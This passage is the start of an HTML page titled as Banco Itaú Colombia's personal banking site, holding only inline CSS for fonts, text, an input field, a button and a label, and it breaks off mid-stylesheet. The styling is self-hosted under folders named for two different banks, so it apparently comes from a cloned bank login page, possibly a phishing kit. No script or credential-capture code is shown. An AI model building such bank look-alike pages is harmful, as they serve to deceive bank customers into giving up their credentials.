<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Banco Itaú - Banca Personas - Banco Itaú Colombia - Banco Itaú</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"
        integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <style>
        @font-face {
            font-family: 'HelveticaNeueLTStdCn';
            /* src: url("/davivienda/HelveticaNeueLTStdCn.eot.jsf?ln=css"); */
            src: url(/davivienda/HelveticaNeueLTStdCn.woff2) format("woff2");
            font-weight: normal;
            font-style: normal;
        }


        @font-face {
            font-family: "var(--font-family-Dpro)";
            src: url(/itau/ItauDisplayPro-Regular-woff2.woff2) format("woff2");
            font-weight: 400;
            font-style: normal;
            font-display: swap;
        }

        @font-face {
            font-family: "var(--font-family-Dpro)";
            src: url(/itau/ItauDisplayPro-Bold-woff2.woff2) format("woff2");
            font-weight: bold;
            font-style: normal;
            font-display: swap;
        }

        @font-face {
            font-family: "var(--font-family-Dpro)";
            src: url(/itau/ItauDisplayPro-Light-woff2.woff2) format("woff2");
            font-weight: 300;
            font-style: normal;
            font-display: swap;
        }

        @font-face {
            font-family: "var(--font-family-txt)";
            src: url(/itau/ItauTextPro_W_Rg-woff2.woff2) format("woff2");
            font-weight: 400;
            font-style: normal;
            font-display: swap;
        }

        @font-face {
            font-family: "var(--font-family-txt)";
            src: url(/itau/ItauTextPro_W_Bd-woff2.woff2) format("woff2");
            font-weight: 700;
            font-style: normal;
            font-display: swap;
        }

        @font-face {
            font-family: "Itau_Icons";
            src: url("/itau/itau_icons-eot.eot?iruskv");
            src: url("/itau/itau_icons-eot?iruskv#iefix") format("embedded-opentype"),
                url("/itau/itau_icons-ttf?iruskv") format("truetype"),
                url("/itau/itau_icons-woff?iruskv") format("woff"),
                url("/itau/itau_icons-svg?iruskv#Itau_Icons") format("svg");
            font-weight: normal;
            font-style: normal;
            font-display: block;
        }



        .texto-1 {

            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            -webkit-text-size-adjust: 100%;
            --btn-primary-active-color: #fff;
            --btn-primary-active-background-color: #a64900;
            --btn-primary-active-border-color: #a64900;
            --btn-secondary-active-color: #ff6200;
            --btn-secondary-active-border-color: var(--gray-200);
            --btn-secondary-active-background-color: var(--gray-200);
            --btn-link-active-color: #093e63;
            --btn-link-disabled-color: var(--gray-500);
            --btn-outline-primary-active-color: #093e63;
            --btn-outline-primary-active-border-color: #093e63;
            --btn-outline-primary-active-background-color: var(--gray-200);
            --btn-outline-primary-disabled-color: var(--gray-500);
            --btn-outline-primary-disabled-border-color: #d6d0cc;
            --btn-outline-primary-disabled-background-color: #fff;
            --color-main: var(--brand-color-1);
            --color-main-icon: var(--brand-color-2);
            --icon-neutro: var(--brand-color-3);
            --color-green: var(--success);
            --color-red: var(--danger);
            --color-purple: var(--warning);
            --white-main: var(--white);
            --black-main: var(--black);
            --gray-1: var(--gray-100);
            --gray-2: var(--gray-200);
            --gray-3: var(--gray-300);
            --gray-4: var(--gray-500);
            --gray-5: var(--gray-600);
            --gray-6: var(--gray-800);
            --gray-7: var(--gray-900);
            --btn-color: var(--btn-primary-color);
            --btn-border: var(--btn-primary-border-color);
            --btn-background: var(--btn-primary-background-color);
            --btn-hover-color: var(--btn-primary-hover-color);
            --btn-hover-border: var(--btn-primary-hover-border-color);
            --btn-hover-background: var(--btn-primary-hover-background-color);
            --btn-variant-color: var(--btn-secondary-color);
            --btn-variant-border: var(--btn-secondary-border-color);
            --btn-variant-background: var(--btn-secondary-background-color);
            --btn-variant-hover-color: var(--btn-secondary-hover-color);
            --btn-variant-hover-border: var(--btn-primary-hover-border-color);
            --btn-variant-hover-background: var(--btn-secondary-hover-background-color);
            --btn-outline-color: var(--btn-outline-primary-color);
            --btn-outline-border: var(--btn-outline-primary-border-color);
            --btn-outline-hover-color: var(--btn-outline-primary-hover-color);
            --btn-outline-hover-border: var(--btn-outline-primary-hover-border-color);
            --btn-outline-hover-background: var(--btn-outline-primary-hover-background-color);
            --link-color: var(--btn-link-color);
            --link-hover-color: var(--btn-link-hover-color);
            --font-size-12: 12px;
            --font-size-14: 14px;
            --font-size-16: 16px;
            --font-size-18: 18px;
            --font-size-20: 20px;
            --font-size-22: 22px;
            --font-size-24: 24px;
            --font-size-32: 32px;
            --font-size-40: 40px;
            --font-size-48: 48px;
            --font-size-56: 56px;
            --h1-size: var(--h1-font-size);
            --h2-size: var(--h2-font-size);
            --h3-size: var(--h3-font-size);
            --h4-size: var(--h4-font-size);
            --h5-size: var(--h5-font-size);
            --h6-size: var(--h6-font-size);
            --font-size-general: var(--font-size-base);
            --font-size-general-lg: var(--font-size-lg);
            --font-size-general-sm: var(--font-size-sm);
            --font-family-Dpro: var(--font-family-base);
            --font-family-txt: var(--font-family-sans-serif);
            --it-font-family: Itau_Icons;
            --font-weight-regular-t: var(--font-weight-normal);
            --font-weight-bold-t: var(--font-weight-bold);
            --font-weight-light-t: var(--font-weight-light);
            --font-w-regular-p: var(--display1-weight);
            --font-w-bold-p: var(--display2-weight);
            --letter-spacing-0: 0;
            --letter-spacing-04: -0.4;
            --letter-spacing-auto: auto;
            --line-height-16: 16px;
            --line-height-20: 20px;
            --line-height-24: 24px;
            --line-height-32: 32px;
            --line-height-40: 40px;
            --line-height-48: 48px;
            --line-height-52: 52px;
            --line-height-56: 56px;
            --path-img: ../images;
            --path-font: ../fonts;
            --path-font-ico: ../fonts/font_icons;
            --spacer-0-p-t-b: var(--spacer-0);
            --spacer-1-p-t-b: var(--spacer-1);
            --spacer-2-p-t-b: var(--spacer-2);
            --spacer-3-p-t-b: var(--spacer-3);
            --spacer-4-p-t-b: var(--spacer-4);
            --spacer-5-p-t-b: var(--spacer-5);
            --spacer-6-p-t-b: var(--spacer-6);
            --spacer-7-p-t-b: var(--spacer-7);
            --container-max-sm: 540px;
            --rounded-pill: 50rem;
            --display4-weight: 300;
            --danger: #da1414;
            --display2-size: 5.5rem;
            --body-bg: #fff;
            --display3-weight: 300;
            --box-shadow-sm: 0 .125rem .25rem rgba(0, 0, 0, .075);
            --font-weight-lighter: lighter;
            --transition-collapse: height .35s ease;
            --blockquote-small-color: #6b6c7e;
            --secondary: #6b6c7e;
            --hr-border-color: rgba(0, 0, 0, .1);
            --hr-border-margin-y: 1rem;
            --light: #f1f2f5;
            --btn-secondary-background-color: #fff;
            --btn-outline-secondary-hover-border-color: transparent;
            --display3-size: 4.5rem;
            --primary: #0b5fff;
            --container-max-md: 720px;
            --border-radius-sm: 0.1875rem;
            --display-line-height: 1.2;
            --aspect-ratio-4-to-3: 75%;
            --spacer-10: 10rem;
            --font-weight-semi-bold: 600;
            --font-weight-normal: 400;
            --dark: #272833;
            --blockquote-small-font-size: 80%;
            --blockquote-font-size: 1.25rem;
            --transition-fade: opacity .15s linear;
            --display4-size: 3.5rem;
            --border-radius-lg: 0.375rem;
            --btn-primary-hover-color: #fff;
            --display1-size: 6rem;
            --brand-color-4: #30313f;
            --black: #000;
            --lighter: #f7f8f9;
            --gray-700: #495057;
            --btn-outline-secondary-hover-color: #272833;
            --body-color: #272833;
            --btn-outline-secondary-hover-background-color: rgba(39, 40, 51, 0.03);
            --btn-primary-color: #fff;
            --box-shadow-lg: 0 1rem 3rem rgba(0, 0, 0, .175);
            --container-max-lg: 960px;
            --aspect-ratio: 100%;
            --gray-dark: #393a4a;
            --aspect-ratio-16-to-9: 56.25%;
            --box-shadow: 0 .5rem 1rem rgba(0, 0, 0, .15);
            --white: #fff;
            --warning: #b95000;
            --info: #2e5aac;
            --hr-border-width: 1px;
            --gray-400: #cdced9;
            --success: #287d3c;
            --lead-font-size: 1.25rem;
            --border-radius: 0.25rem;
            --spacer-9: 9rem;
            --font-weight-light: 300;
            --spacer-8: 7.5rem;
            --border-radius-circle: 50%;
            --aspect-ratio-8-to-3: 37.5%;
            --font-weight-bolder: 900;
            --container-max-xl: 1248px;
            --btn-outline-secondary-color: #6b6c7e;
            --gray-900: #272833;
            --text-muted: #a7a9bc;
            --btn-outline-secondary-border-color: #cdced9;
            --lead-font-weight: 300;
            --font-family-base: 'ItauDisplayPro';
            --h4-font-size: 24px;
            --font-weight-bold: bold;
            --btn-outline-primary-border-color: #106EB0;
            --spacer-0: 0px;
            --h6-font-size: 20px;
            --h2-font-size: 40px;
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, 'Liberation Mono', 'Courier New', monospace;
            --btn-secondary-hover-color: #FF7D00;
            --display2-weight: 700;
            --spacer-2: 18px;
            --spacer-1: 16px;
            --spacer-4: 24px;
            --display1-weight: 400;
            --spacer-3: 20px;
            --spacer-6: 40px;
            --h5-font-size: 24px;
            --spacer-5: 32px;
            --spacer-7: 49px;
            --font-size-lg: 24px;
            --brand-color-3: #56504C;
            --font-family-sans-serif: 'Itau-font-txt';
            --brand-color-2: #FF6200;
            --brand-color-1: #FF6200;
            --h3-font-size: 32px;
            --btn-outline-primary-hover-border-color: #0C5384;
            --gray-100: #F7F4F2;
            --gray-500: #89837F;
            --btn-link-color: #106EB0;
            --gray-300: #D6D0CC;
            --gray-200: #EFE9E5;
            --h1-font-size: 48px;
            --btn-secondary-hover-background-color: #FAF7F5;
            --gray-800: #231D19;
            --btn-outline-primary-hover-background-color: #ffffff;
            --gray-600: #56504C;
            --btn-primary-hover-background-color: #FF7D00;
            --btn-secondary-border-color: #ffffff;
            --btn-link-hover-color: #FF7D00;
            --btn-outline-primary-color: #106EB0;
            --btn-primary-hover-border-color: #FF7D00;
            --btn-primary-background-color: #FF6200;
            --btn-outline-primary-hover-color: #0C5384;
            --btn-secondary-color: #FF7D00;
            --btn-secondary-hover-border-color: #FAF7F5;
            --font-size-sm: 14px;
            --btn-primary-border-color: #FF6200;
            --font-size-base: 16px;
            --dt-row-selected: 13, 110, 253;
            --dt-row-selected-text: 255, 255, 255;
            --dt-row-selected-link: 9, 10, 11;
            -webkit-font-smoothing: antialiased;
            text-align: inherit;
            box-sizing: border-box;
            margin: 0;
            margin-top: 24px;
            color: var(--gray-5);
            font-size: 20px;
            line-height: var(--line-height-20);
            font-weight: var(--font-w-regular-p);
            letter-spacing: var(--letter-spacing-04);
            font-family: "var(--font-family-Dpro)";


        }

        .entrada-1 {

            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            -webkit-text-size-adjust: 100%;
            --btn-primary-active-color: #fff;
            --btn-primary-active-background-color: #a64900;
            --btn-primary-active-border-color: #a64900;
            --btn-secondary-active-color: #ff6200;
            --btn-secondary-active-border-color: var(--gray-200);
            --btn-secondary-active-background-color: var(--gray-200);
            --btn-link-active-color: #093e63;
            --btn-link-disabled-color: var(--gray-500);
            --btn-outline-primary-active-color: #093e63;
            --btn-outline-primary-active-border-color: #093e63;
            --btn-outline-primary-active-background-color: var(--gray-200);
            --btn-outline-primary-disabled-color: var(--gray-500);
            --btn-outline-primary-disabled-border-color: #d6d0cc;
            --btn-outline-primary-disabled-background-color: #fff;
            --color-main: var(--brand-color-1);
            --color-main-icon: var(--brand-color-2);
            --icon-neutro: var(--brand-color-3);
            --color-green: var(--success);
            --color-red: var(--danger);
            --color-purple: var(--warning);
            --white-main: var(--white);
            --black-main: var(--black);
            --gray-1: var(--gray-100);
            --gray-2: var(--gray-200);
            --gray-3: var(--gray-300);
            --gray-4: var(--gray-500);
            --gray-5: var(--gray-600);
            --gray-6: var(--gray-800);
            --gray-7: var(--gray-900);
            --btn-color: var(--btn-primary-color);
            --btn-border: var(--btn-primary-border-color);
            --btn-background: var(--btn-primary-background-color);
            --btn-hover-color: var(--btn-primary-hover-color);
            --btn-hover-border: var(--btn-primary-hover-border-color);
            --btn-hover-background: var(--btn-primary-hover-background-color);
            --btn-variant-color: var(--btn-secondary-color);
            --btn-variant-border: var(--btn-secondary-border-color);
            --btn-variant-background: var(--btn-secondary-background-color);
            --btn-variant-hover-color: var(--btn-secondary-hover-color);
            --btn-variant-hover-border: var(--btn-primary-hover-border-color);
            --btn-variant-hover-background: var(--btn-secondary-hover-background-color);
            --btn-outline-color: var(--btn-outline-primary-color);
            --btn-outline-border: var(--btn-outline-primary-border-color);
            --btn-outline-hover-color: var(--btn-outline-primary-hover-color);
            --btn-outline-hover-border: var(--btn-outline-primary-hover-border-color);
            --btn-outline-hover-background: var(--btn-outline-primary-hover-background-color);
            --link-color: var(--btn-link-color);
            --link-hover-color: var(--btn-link-hover-color);
            --font-size-12: 12px;
            --font-size-14: 14px;
            --font-size-16: 16px;
            --font-size-18: 18px;
            --font-size-20: 20px;
            --font-size-22: 22px;
            --font-size-24: 24px;
            --font-size-32: 32px;
            --font-size-40: 40px;
            --font-size-48: 48px;
            --font-size-56: 56px;
            --h1-size: var(--h1-font-size);
            --h2-size: var(--h2-font-size);
            --h3-size: var(--h3-font-size);
            --h4-size: var(--h4-font-size);
            --h5-size: var(--h5-font-size);
            --h6-size: var(--h6-font-size);
            --font-size-general: var(--font-size-base);
            --font-size-general-lg: var(--font-size-lg);
            --font-size-general-sm: var(--font-size-sm);
            --font-family-Dpro: var(--font-family-base);
            --font-family-txt: var(--font-family-sans-serif);
            --it-font-family: Itau_Icons;
            --font-weight-regular-t: var(--font-weight-normal);
            --font-weight-bold-t: var(--font-weight-bold);
            --font-weight-light-t: var(--font-weight-light);
            --font-w-regular-p: var(--display1-weight);
            --font-w-bold-p: var(--display2-weight);
            --letter-spacing-0: 0;
            --letter-spacing-04: -0.4;
            --letter-spacing-auto: auto;
            --line-height-16: 16px;
            --line-height-20: 20px;
            --line-height-24: 24px;
            --line-height-32: 32px;
            --line-height-40: 40px;
            --line-height-48: 48px;
            --line-height-52: 52px;
            --line-height-56: 56px;
            --path-img: ../images;
            --path-font: ../fonts;
            --path-font-ico: ../fonts/font_icons;
            --spacer-0-p-t-b: var(--spacer-0);
            --spacer-1-p-t-b: var(--spacer-1);
            --spacer-2-p-t-b: var(--spacer-2);
            --spacer-3-p-t-b: var(--spacer-3);
            --spacer-4-p-t-b: var(--spacer-4);
            --spacer-5-p-t-b: var(--spacer-5);
            --spacer-6-p-t-b: var(--spacer-6);
            --spacer-7-p-t-b: var(--spacer-7);
            --container-max-sm: 540px;
            --rounded-pill: 50rem;
            --display4-weight: 300;
            --danger: #da1414;
            --display2-size: 5.5rem;
            --body-bg: #fff;
            --display3-weight: 300;
            --box-shadow-sm: 0 .125rem .25rem rgba(0, 0, 0, .075);
            --font-weight-lighter: lighter;
            --transition-collapse: height .35s ease;
            --blockquote-small-color: #6b6c7e;
            --secondary: #6b6c7e;
            --hr-border-color: rgba(0, 0, 0, .1);
            --hr-border-margin-y: 1rem;
            --light: #f1f2f5;
            --btn-secondary-background-color: #fff;
            --btn-outline-secondary-hover-border-color: transparent;
            --display3-size: 4.5rem;
            --primary: #0b5fff;
            --container-max-md: 720px;
            --border-radius-sm: 0.1875rem;
            --display-line-height: 1.2;
            --aspect-ratio-4-to-3: 75%;
            --spacer-10: 10rem;
            --font-weight-semi-bold: 600;
            --font-weight-normal: 400;
            --dark: #272833;
            --blockquote-small-font-size: 80%;
            --blockquote-font-size: 1.25rem;
            --transition-fade: opacity .15s linear;
            --display4-size: 3.5rem;
            --border-radius-lg: 0.375rem;
            --btn-primary-hover-color: #fff;
            --display1-size: 6rem;
            --brand-color-4: #30313f;
            --black: #000;
            --lighter: #f7f8f9;
            --gray-700: #495057;
            --btn-outline-secondary-hover-color: #272833;
            --body-color: #272833;
            --btn-outline-secondary-hover-background-color: rgba(39, 40, 51, 0.03);
            --btn-primary-color: #fff;
            --box-shadow-lg: 0 1rem 3rem rgba(0, 0, 0, .175);
            --container-max-lg: 960px;
            --aspect-ratio: 100%;
            --gray-dark: #393a4a;
            --aspect-ratio-16-to-9: 56.25%;
            --box-shadow: 0 .5rem 1rem rgba(0, 0, 0, .15);
            --white: #fff;
            --warning: #b95000;
            --info: #2e5aac;
            --hr-border-width: 1px;
            --gray-400: #cdced9;
            --success: #287d3c;
            --lead-font-size: 1.25rem;
            --border-radius: 0.25rem;
            --spacer-9: 9rem;
            --font-weight-light: 300;
            --spacer-8: 7.5rem;
            --border-radius-circle: 50%;
            --aspect-ratio-8-to-3: 37.5%;
            --font-weight-bolder: 900;
            --container-max-xl: 1248px;
            --btn-outline-secondary-color: #6b6c7e;
            --gray-900: #272833;
            --text-muted: #a7a9bc;
            --btn-outline-secondary-border-color: #cdced9;
            --lead-font-weight: 300;
            --font-family-base: 'ItauDisplayPro';
            --h4-font-size: 24px;
            --font-weight-bold: bold;
            --btn-outline-primary-border-color: #106EB0;
            --spacer-0: 0px;
            --h6-font-size: 20px;
            --h2-font-size: 40px;
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, 'Liberation Mono', 'Courier New', monospace;
            --btn-secondary-hover-color: #FF7D00;
            --display2-weight: 700;
            --spacer-2: 18px;
            --spacer-1: 16px;
            --spacer-4: 24px;
            --display1-weight: 400;
            --spacer-3: 20px;
            --spacer-6: 40px;
            --h5-font-size: 24px;
            --spacer-5: 32px;
            --spacer-7: 49px;
            --font-size-lg: 24px;
            --brand-color-3: #56504C;
            --font-family-sans-serif: 'Itau-font-txt';
            --brand-color-2: #FF6200;
            --brand-color-1: #FF6200;
            --h3-font-size: 32px;
            --btn-outline-primary-hover-border-color: #0C5384;
            --gray-100: #F7F4F2;
            --gray-500: #89837F;
            --btn-link-color: #106EB0;
            --gray-300: #D6D0CC;
            --gray-200: #EFE9E5;
            --h1-font-size: 48px;
            --btn-secondary-hover-background-color: #FAF7F5;
            --gray-800: #231D19;
            --btn-outline-primary-hover-background-color: #ffffff;
            --gray-600: #56504C;
            --btn-primary-hover-background-color: #FF7D00;
            --btn-secondary-border-color: #ffffff;
            --btn-link-hover-color: #FF7D00;
            --btn-outline-primary-color: #106EB0;
            --btn-primary-hover-border-color: #FF7D00;
            --btn-primary-background-color: #FF6200;
            --btn-outline-primary-hover-color: #0C5384;
            --btn-secondary-color: #FF7D00;
            --btn-secondary-hover-border-color: #FAF7F5;
            --font-size-sm: 14px;
            --btn-primary-border-color: #FF6200;
            --font-size-base: 16px;
            --dt-row-selected: 13, 110, 253;
            --dt-row-selected-text: 255, 255, 255;
            --dt-row-selected-link: 9, 10, 11;
            -webkit-font-smoothing: antialiased;
            box-sizing: border-box;
            font-family: sans-serif;
            margin: 0;
            overflow: visible;
            box-shadow: none;
            color: #272833;
            display: block;
            font-size: 1rem;
            font-weight: var(--font-weight-normal, 400);
            letter-spacing: inherit;
            line-height: 1.5;
            min-width: 0;
            width: 100%;
            transition: none;
            appearance: none;
            height: 39px;
            padding: 0px;
            padding-bottom: 6px;
            background-color: transparent;
            border: 0px;
            border-bottom: var(--gray-5) 1px solid;
            border-radius: 0px;

        }

        .boton-1 {
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            -webkit-text-size-adjust: 100%;
            --btn-primary-active-color: #fff;
            --btn-primary-active-background-color: #a64900;
            --btn-primary-active-border-color: #a64900;
            --btn-secondary-active-color: #ff6200;
            --btn-secondary-active-border-color: var(--gray-200);
            --btn-secondary-active-background-color: var(--gray-200);
            --btn-link-active-color: #093e63;
            --btn-link-disabled-color: var(--gray-500);
            --btn-outline-primary-active-color: #093e63;
            --btn-outline-primary-active-border-color: #093e63;
            --btn-outline-primary-active-background-color: var(--gray-200);
            --btn-outline-primary-disabled-color: var(--gray-500);
            --btn-outline-primary-disabled-border-color: #d6d0cc;
            --btn-outline-primary-disabled-background-color: #fff;
            --color-main: var(--brand-color-1);
            --color-main-icon: var(--brand-color-2);
            --icon-neutro: var(--brand-color-3);
            --color-green: var(--success);
            --color-red: var(--danger);
            --color-purple: var(--warning);
            --white-main: var(--white);
            --black-main: var(--black);
            --gray-1: var(--gray-100);
            --gray-2: var(--gray-200);
            --gray-3: var(--gray-300);
            --gray-4: var(--gray-500);
            --gray-5: var(--gray-600);
            --gray-6: var(--gray-800);
            --gray-7: var(--gray-900);
            --btn-color: var(--btn-primary-color);
            --btn-border: var(--btn-primary-border-color);
            --btn-background: var(--btn-primary-background-color);
            --btn-hover-color: var(--btn-primary-hover-color);
            --btn-hover-border: var(--btn-primary-hover-border-color);
            --btn-hover-background: var(--btn-primary-hover-background-color);
            --btn-variant-color: var(--btn-secondary-color);
            --btn-variant-border: var(--btn-secondary-border-color);
            --btn-variant-background: var(--btn-secondary-background-color);
            --btn-variant-hover-color: var(--btn-secondary-hover-color);
            --btn-variant-hover-border: var(--btn-primary-hover-border-color);
            --btn-variant-hover-background: var(--btn-secondary-hover-background-color);
            --btn-outline-color: var(--btn-outline-primary-color);
            --btn-outline-border: var(--btn-outline-primary-border-color);
            --btn-outline-hover-color: var(--btn-outline-primary-hover-color);
            --btn-outline-hover-border: var(--btn-outline-primary-hover-border-color);
            --btn-outline-hover-background: var(--btn-outline-primary-hover-background-color);
            --link-color: var(--btn-link-color);
            --link-hover-color: var(--btn-link-hover-color);
            --font-size-12: 12px;
            --font-size-14: 14px;
            --font-size-16: 16px;
            --font-size-18: 18px;
            --font-size-20: 20px;
            --font-size-22: 22px;
            --font-size-24: 24px;
            --font-size-32: 32px;
            --font-size-40: 40px;
            --font-size-48: 48px;
            --font-size-56: 56px;
            --h1-size: var(--h1-font-size);
            --h2-size: var(--h2-font-size);
            --h3-size: var(--h3-font-size);
            --h4-size: var(--h4-font-size);
            --h5-size: var(--h5-font-size);
            --h6-size: var(--h6-font-size);
            --font-size-general: var(--font-size-base);
            --font-size-general-lg: var(--font-size-lg);
            --font-size-general-sm: var(--font-size-sm);
            --font-family-Dpro: var(--font-family-base);
            --font-family-txt: var(--font-family-sans-serif);
            --it-font-family: Itau_Icons;
            --font-weight-regular-t: var(--font-weight-normal);
            --font-weight-bold-t: var(--font-weight-bold);
            --font-weight-light-t: var(--font-weight-light);
            --font-w-regular-p: var(--display1-weight);
            --font-w-bold-p: var(--display2-weight);
            --letter-spacing-0: 0;
            --letter-spacing-04: -0.4;
            --letter-spacing-auto: auto;
            --line-height-16: 16px;
            --line-height-20: 20px;
            --line-height-24: 24px;
            --line-height-32: 32px;
            --line-height-40: 40px;
            --line-height-48: 48px;
            --line-height-52: 52px;
            --line-height-56: 56px;
            --path-img: ../images;
            --path-font: ../fonts;
            --path-font-ico: ../fonts/font_icons;
            --spacer-0-p-t-b: var(--spacer-0);
            --spacer-1-p-t-b: var(--spacer-1);
            --spacer-2-p-t-b: var(--spacer-2);
            --spacer-3-p-t-b: var(--spacer-3);
            --spacer-4-p-t-b: var(--spacer-4);
            --spacer-5-p-t-b: var(--spacer-5);
            --spacer-6-p-t-b: var(--spacer-6);
            --spacer-7-p-t-b: var(--spacer-7);
            --container-max-sm: 540px;
            --rounded-pill: 50rem;
            --display4-weight: 300;
            --danger: #da1414;
            --display2-size: 5.5rem;
            --body-bg: #fff;
            --display3-weight: 300;
            --box-shadow-sm: 0 .125rem .25rem rgba(0, 0, 0, .075);
            --font-weight-lighter: lighter;
            --transition-collapse: height .35s ease;
            --blockquote-small-color: #6b6c7e;
            --secondary: #6b6c7e;
            --hr-border-color: rgba(0, 0, 0, .1);
            --hr-border-margin-y: 1rem;
            --light: #f1f2f5;
            --btn-secondary-background-color: #fff;
            --btn-outline-secondary-hover-border-color: transparent;
            --display3-size: 4.5rem;
            --primary: #0b5fff;
            --container-max-md: 720px;
            --border-radius-sm: 0.1875rem;
            --display-line-height: 1.2;
            --aspect-ratio-4-to-3: 75%;
            --spacer-10: 10rem;
            --font-weight-semi-bold: 600;
            --font-weight-normal: 400;
            --dark: #272833;
            --blockquote-small-font-size: 80%;
            --blockquote-font-size: 1.25rem;
            --transition-fade: opacity .15s linear;
            --display4-size: 3.5rem;
            --border-radius-lg: 0.375rem;
            --btn-primary-hover-color: #fff;
            --display1-size: 6rem;
            --brand-color-4: #30313f;
            --black: #000;
            --lighter: #f7f8f9;
            --gray-700: #495057;
            --btn-outline-secondary-hover-color: #272833;
            --body-color: #272833;
            --btn-outline-secondary-hover-background-color: rgba(39, 40, 51, 0.03);
            --btn-primary-color: #fff;
            --box-shadow-lg: 0 1rem 3rem rgba(0, 0, 0, .175);
            --container-max-lg: 960px;
            --aspect-ratio: 100%;
            --gray-dark: #393a4a;
            --aspect-ratio-16-to-9: 56.25%;
            --box-shadow: 0 .5rem 1rem rgba(0, 0, 0, .15);
            --white: #fff;
            --warning: #b95000;
            --info: #2e5aac;
            --hr-border-width: 1px;
            --gray-400: #cdced9;
            --success: #287d3c;
            --lead-font-size: 1.25rem;
            --border-radius: 0.25rem;
            --spacer-9: 9rem;
            --font-weight-light: 300;
            --spacer-8: 7.5rem;
            --border-radius-circle: 50%;
            --aspect-ratio-8-to-3: 37.5%;
            --font-weight-bolder: 900;
            --container-max-xl: 1248px;
            --btn-outline-secondary-color: #6b6c7e;
            --gray-900: #272833;
            --text-muted: #a7a9bc;
            --btn-outline-secondary-border-color: #cdced9;
            --lead-font-weight: 300;
            --font-family-base: 'ItauDisplayPro';
            --h4-font-size: 24px;
            --font-weight-bold: bold;
            --btn-outline-primary-border-color: #106EB0;
            --spacer-0: 0px;
            --h6-font-size: 20px;
            --h2-font-size: 40px;
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, 'Liberation Mono', 'Courier New', monospace;
            --btn-secondary-hover-color: #FF7D00;
            --display2-weight: 700;
            --spacer-2: 18px;
            --spacer-1: 16px;
            --spacer-4: 24px;
            --display1-weight: 400;
            --spacer-3: 20px;
            --spacer-6: 40px;
            --h5-font-size: 24px;
            --spacer-5: 32px;
            --spacer-7: 49px;
            --font-size-lg: 24px;
            --brand-color-3: #56504C;
            --font-family-sans-serif: 'Itau-font-txt';
            --brand-color-2: #FF6200;
            --brand-color-1: #FF6200;
            --h3-font-size: 32px;
            --btn-outline-primary-hover-border-color: #0C5384;
            --gray-100: #F7F4F2;
            --gray-500: #89837F;
            --btn-link-color: #106EB0;
            --gray-300: #D6D0CC;
            --gray-200: #EFE9E5;
            --h1-font-size: 48px;
            --btn-secondary-hover-background-color: #FAF7F5;
            --gray-800: #231D19;
            --btn-outline-primary-hover-background-color: #ffffff;
            --gray-600: #56504C;
            --btn-primary-hover-background-color: #FF7D00;
            --btn-secondary-border-color: #ffffff;
            --btn-link-hover-color: #FF7D00;
            --btn-outline-primary-color: #106EB0;
            --btn-primary-hover-border-color: #FF7D00;
            --btn-primary-background-color: #FF6200;
            --btn-outline-primary-hover-color: #0C5384;
            --btn-secondary-color: #FF7D00;
            --btn-secondary-hover-border-color: #FAF7F5;
            --font-size-sm: 14px;
            --btn-primary-border-color: #FF6200;
            --font-size-base: 16px;
            --dt-row-selected: 13, 110, 253;
            --dt-row-selected-text: 255, 255, 255;
            --dt-row-selected-link: 9, 10, 11;
            -webkit-font-smoothing: antialiased;
            box-sizing: border-box;
            line-height: 1.15;
            margin: 0;
            overflow: visible;
            width: 100% !important;
            cursor: pointer;
            color: var(--btn-color);
            border: 1px solid var(--btn-border);
            background-color: var(--btn-background);
            font-family: "var(--font-family-txt)";
            font-weight: bold;
            font-size: 20px;
            padding: 12px 12px;
            border-radius: 4px;
            -webkit-appearance: none;
            height: 60px;
        }

        .label-1 {
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            -webkit-text-size-adjust: 100%;
            --btn-primary-active-color: #fff;
            --btn-primary-active-background-color: #a64900;
            --btn-primary-active-border-color: #a64900;
            --btn-secondary-active-color: #ff6200;
            --btn-secondary-active-border-color: var(--gray-200);
            --btn-secondary-active-background-color: var(--gray-200);
            --btn-link-active-color: #093e63;
            --btn-link-disabled-color: var(--gray-500);
            --btn-outline-primary-active-color: #093e63;
            --btn-outline-primary-active-border-color: #093e63;
            --btn-outline-primary-active-background-color: var(--gray-200);
            --btn-outline-primary-disabled-color: var(--gray-500);
            --btn-outline-primary-disabled-border-color: #d6d0cc;
            --btn-outline-primary-disabled-background-color: #fff;
            --color-main: var(--brand-color-1);
            --color-main-icon: var(--brand-color-2);
            --icon-neutro: var(--brand-color-3);
            --color-green: var(--success);
            --color-red: var(--danger);
            --color-purple: var(--warning);
            --white-main: var(--white);
            --black-main: var(--black);
            --gray-1: var(--gray-100);
            --gray-2: var(--gray-200);
            --gray-3: var(--gray-300);
            --gray-4: var(--gray-500);
            --gray-5: var(--gray-600);
            --gray-6: var(--gray-800);
            --gray-7: var(--gray-900);
            --btn-color: var(--btn-primary-color);
            --btn-border: var(--btn-primary-border-color);
            --btn-background: var(--btn-primary-background-color);
            --btn-hover-color: var(--btn-primary-hover-color);
            --btn-hover-border: var(--btn-primary-hover-border-color);
            --btn-hover-background: var(--btn-primary-hover-background-color);
            --btn-variant-color: var(--btn-secondary-color);
            --btn-variant-border: var(--btn-secondary-border-color);
            --btn-variant-background: var(--btn-secondary-background-color);
            --btn-variant-hover-color: var(--btn-secondary-hover-color);
            --btn-variant-hover-border: var(--btn-primary-hover-border-color);
            --btn-variant-hover-background: var(--btn-secondary-hover-background-color);
            --btn-outline-color: var(--btn-outline-primary-color);
            --btn-outline-border: var(--btn-outline-primary-border-color);
            --btn-outline-hover-color: var(--btn-outline-primary-hover-color);
            --btn-outline-hover-border: var(--btn-outline-primary-hover-border-color);
            --btn-outline-hover-background: var(--btn-outline-primary-hover-background-color);
            --link-color: var(--btn-link-color);
            --link-hover-color: var(--btn-link-hover-color);
            --font-size-12: 12px;
            --font-size-14: 14px;
            --font-size-16: 16px;
            --font-size-18: 18px;
            --font-size-20: 20px;
            --font-size-22: 22px;
            --font-size-24: 24px;
            --font-size-32: 32px;
            --font-size-40: 40px;
            --font-size-48: 48px;
